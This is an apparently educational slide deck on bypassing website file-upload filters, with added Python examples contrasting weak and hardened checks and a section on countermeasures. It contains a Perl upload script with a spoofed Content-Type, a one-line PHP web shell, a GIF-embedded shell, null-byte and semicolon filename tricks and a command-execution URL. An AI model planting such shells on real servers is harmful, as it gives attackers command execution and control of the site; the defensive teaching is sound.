BYPASS FILE UPLOAD RESTRICTIONS ON WEBSITES
AND SECURITY MEASURES
By K. Subramanian and K. R. Mukesh
File upload
• Necessity: social networking websites, blogs, file sharing, etc.
• Web developers often do not consider the threats
• Uploaded files must be sanitized
• If they are not, an upload can lead to local file inclusion and full compromise of the site
• Filtering mechanisms
Methods of filtering
Content-Type verification
• Each part of a multipart/form-data HTTP POST carries a MIME type that the client chooses:
Content-Disposition: form-data; name="uploaded_file[]"; filename="18.jpg"\r\n
Content-Type: image/jpeg\r\n
\r\n
<file content>
• To bypass this filter, edit the Content-Type to an accepted one. The header is written by the client, so the server cannot trust it.
#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;

my $ua = LWP::UserAgent->new;
# Upload sh.PHP but declare the part as a PDF; a server that only checks
# the declared Content-Type accepts it.
my $res = $ua->request(
    POST 'http://example.com/upload.PHP',
    Content_Type => 'form-data',
    Content      => [
        userfile => ["sh.PHP", "sh.PHP", "Content-Type" => "application/pdf"],
    ],
);
print $res->as_string();
An easy way – Tamper Data
• Tamper Data is a Firefox add-on that lets you modify the POST data (including the filename and Content-Type of an upload part) before it is submitted
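The two slides above describe the same weakness from the client side and from the server side. The following Python script is an added example (not code from the slides or from the authors): it builds the multipart body by hand, parses it the way a server would, and runs the declared-Content-Type filter next to a hardened check that compares the declared type with the first bytes of the file. The boundary string, the field name userfile and the allowed-type list are assumptions made for the example.

```python
import re

BOUNDARY = "----boundary7MA4YWxkTrZu0gW"          # constructed; any string absent from the data works
ALLOWED_TYPES = {"image/jpeg", "image/png", "image/gif", "application/pdf"}
# Leading bytes a genuine file of each allowed type starts with.
MAGIC = {"image/jpeg": b"\xff\xd8\xff", "image/png": b"\x89PNG", "image/gif": b"GIF8",
         "application/pdf": b"%PDF-"}
SHELL = b"<?php system($_GET['command']); ?>\n"    # the slides' one-line PHP shell


def build_multipart(field: str, filename: str, content_type: str, data: bytes) -> bytes:
    """Build a single-part multipart/form-data body by hand.
    The filename and the part's Content-Type are whatever the client writes here."""
    head = (
        f"--{BOUNDARY}\r\n"
        f'Content-Disposition: form-data; name="{field}"; filename="{filename}"\r\n'
        f"Content-Type: {content_type}\r\n\r\n"
    )
    return head.encode() + data + f"\r\n--{BOUNDARY}--\r\n".encode()


def parse_upload(body: bytes):
    """Server side: pull (filename, declared Content-Type, file bytes) out of the body."""
    delim = f"--{BOUNDARY}".encode()
    part = body.split(delim)[1]                           # [0] is the empty preamble, [2] the closing "--"
    head, _, payload = part[2:].partition(b"\r\n\r\n")    # [2:] drops the CRLF after the delimiter
    payload = payload[:-2]                                # the CRLF before the next delimiter belongs to it
    headers = {}
    for line in head.decode().split("\r\n"):
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    filename = re.search(r'filename="([^"]*)"', headers["content-disposition"]).group(1)
    return filename, headers["content-type"], payload


def declared_type_filter(declared: str) -> bool:
    """The slide's filter: trust the Content-Type the client put on the part."""
    return declared in ALLOWED_TYPES


def sniffing_filter(declared: str, data: bytes) -> bool:
    """Hardened: the declared type must be allowed AND the bytes must look like that type."""
    return declared in ALLOWED_TYPES and data.startswith(MAGIC[declared])


def run(filename: str = "sh.php", declared: str = "application/pdf", data: bytes = SHELL) -> dict:
    """What each filter says about one upload attempt; the defaults reproduce the slide's bypass."""
    name, ctype, payload = parse_upload(build_multipart("userfile", filename, declared, data))
    return {"filename": name, "declared": ctype, "payload_intact": payload == data,
            "declared_type_filter": declared_type_filter(ctype),
            "sniffing_filter": sniffing_filter(ctype, payload)}


if __name__ == "__main__":
    print(run())
```

With the defaults, run() shows sh.php declared as application/pdf passing the declared-type filter and failing the sniffing filter. Note that magic-byte sniffing alone is still not enough: the next slides show a file whose first bytes are a genuine image header and whose body is PHP.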
Filename extension verification
• Check the extension of the file and filter out dangerous ones with a blacklist:
$blacklist = array(".php", ".phtml", ".php3", ".php4");
• To bypass this, use a NULL byte in the filename:
sh.php%00.pdf
(or, on IIS 6) sh.asp;xx.pdf
• While uploading, the extension that is checked is .pdf; when the file is stored or accessed the name is cut at the null byte (or at the semicolon), so sh.php is what gets delivered to the PHP interpreter
• Null-byte truncation works against PHP before 5.3.4, which started rejecting paths that contain a NUL; the semicolon trick relies on IIS 6 treating ";" as the end of the file name. A blacklist also misses anything it does not list, e.g. the upper-case sh.PHP from the Perl script above slips past a case-sensitive comparison
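The following Python script is an added example (not code from the slides or from the authors). It runs the slide's blacklist over the three bypass names, emulates how the name was truncated on the affected platforms, and puts an allow-list check beside it. The platform labels "php-pre-5.3.4" and "iis6", the SCRIPT_EXTS list and the allow-list are assumptions made for the example; the truncation functions are an emulation, not real server code.

```python
import re
from urllib.parse import unquote

# The slide's blacklist: $blacklist = array(".php", ".phtml", ".php3", ".php4");
BLACKLIST = {".php", ".phtml", ".php3", ".php4"}
# Extensions a typical web server hands to a script engine (Apache's mod_mime matches them
# case-insensitively, which is why sh.PHP still runs).
SCRIPT_EXTS = tuple(BLACKLIST) + (".asp",)
# Hardened alternative: an allow-list of what the application actually needs.
ALLOWLIST = {".jpg", ".jpeg", ".png", ".gif", ".pdf"}


def last_extension(name: str) -> str:
    return "." + name.rsplit(".", 1)[1] if "." in name else ""


def blacklist_check(name: str) -> bool:
    """Weak filter from the slide: compare the text after the last dot with the blacklist."""
    return last_extension(name) not in BLACKLIST


def stored_name(name: str, platform: str) -> str:
    """Name that actually lands on disk.  Emulation written for this example, not server code:
    - "php-pre-5.3.4": the name reached C string functions, which stop at the first NUL;
    - "iis6": IIS 6 treated ';' in a path as the end of the file name (sh.asp;xx.pdf -> sh.asp);
    - anything else: the name is kept as-is."""
    if platform == "php-pre-5.3.4":
        return name.split("\x00", 1)[0]
    if platform == "iis6":
        return name.split(";", 1)[0]
    return name


def allowlist_check(name: str) -> bool:
    """Hardened filter: no control characters or path/query separators, then a listed
    extension, compared case-insensitively."""
    if re.search(r"[\x00-\x1f;/\\]", name):
        return False
    return last_extension(name).lower() in ALLOWLIST


def evaluate(raw_filename: str, platform: str) -> dict:
    """Run one upload name through both filters and report what would execute."""
    # The slide writes the NUL byte as %00; decode it so the string holds the real byte.
    name = unquote(raw_filename)
    landed = stored_name(name, platform)
    return {
        "blacklist_passes": blacklist_check(name),
        "stored_as": landed,
        "executes_as_script": landed.lower().endswith(SCRIPT_EXTS),
        "allowlist_passes": allowlist_check(name),
    }


if __name__ == "__main__":
    for raw, platform in [("sh.php%00.pdf", "php-pre-5.3.4"), ("sh.asp;xx.pdf", "iis6"),
                          ("sh.PHP", "php-5.3.4+"), ("photo.JPG", "php-5.3.4+")]:
        print(raw, platform, evaluate(raw, platform))
```

All three attack names pass the blacklist and end up stored under a script extension; none of them passes the allow-list, while photo.JPG passes it because the comparison is case-insensitive.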
File content verification
• Applicable to image files: the server checks that the upload parses as an image, typically with
$imageinfo = getimagesize($_FILES['userfile']['tmp_name']);
• To bypass this, manually craft an image file with PHP code embedded in it:
Content-Type: image/gif
GIF89a(...some binary data...)<?php system($_GET['command']); ?>(...binary data...)
• getimagesize() only inspects the image header fields, not the whole file, so the crafted file passes. When the file is later handed to the PHP interpreter, it ignores the binary garbage and executes the code between the <?php ... ?> tags
A Simple Demonstration
Towards Bypassing these Filters
Worst case scenario
• Local file inclusion or direct access to an uploaded PHP shell. A simple PHP shell:
<?php system($_GET['command']); ?>
• Executes commands on the remote server:
http://www.example.com/uploads/sh.php?command=ifconfig
• Entire control of the web server account, and a foothold for rooting the machine
• Defacements, database access, credential theft, etc.
Security Measures
• Prevent direct access to the uploaded files by storing them outside the document root:
$uploaddir = '/var/spool/uploads/';   # outside of the web root
• Or block web access to the upload directory with an .htaccess file, e.g.
IndexIgnore */*
(IndexIgnore only hides the directory listing; to stop uploads from being executed the directory also needs the script handler disabled or all requests denied)
• Overhead: every download must then be read and written by a script
• A download script that builds the path from user input is itself exposed to directory traversal attacks
Random file name implementation
• Prevents the attacker from knowing the name under which the file was stored
• Map the random name to the original name in the database:
$res = $db->query("INSERT INTO uploads SET name=?, original_name=?");
• Query the mapping when reading the file
• A little overhead, but secure
• Think again: the original filename is attacker-controlled, so it must be bound as a parameter (as the ? placeholders above do); concatenating it into the query string leads to SQL injection
Conclusion
• It is complicated to implement a secure file upload facility
• Many filters = slow response, which can be abused for Denial of Service (DoS) attacks
• The best way is to maintain UPLOAD LOGS containing user info such as the IP address; they are helpful to trace an attacker
• Follow secure coding practices
Thank you